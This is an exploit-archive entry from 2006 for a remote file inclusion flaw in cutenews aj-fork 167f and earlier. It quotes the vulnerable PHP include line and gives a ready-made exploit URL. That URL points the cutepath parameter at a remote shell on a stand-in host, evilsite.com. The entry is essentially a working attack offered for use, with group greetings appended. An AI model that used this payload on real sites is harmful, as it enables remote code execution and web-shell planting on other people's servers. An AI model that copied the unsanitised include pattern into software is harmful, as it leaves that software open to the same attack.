cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability
# Published : 2006-12-04
# Author : DeltahackingTEAM
# Previous Title : Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability
# Next Title : PHP Upload Center 2.0 (activate.php) File Include Vulnerabilities

===========================================================================================================
DeltasecurityTEAM
www.Deltasecurity.ir
===========================================================================================================
* Portal Name : cutenews aj-fork

* Class = Remote File Inclusion ;
 
* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Tanha )

----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------

    include($cutepath.'/inc/plugins.php');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:
    http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?

----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug

# www.Syue.com [2006-12-04]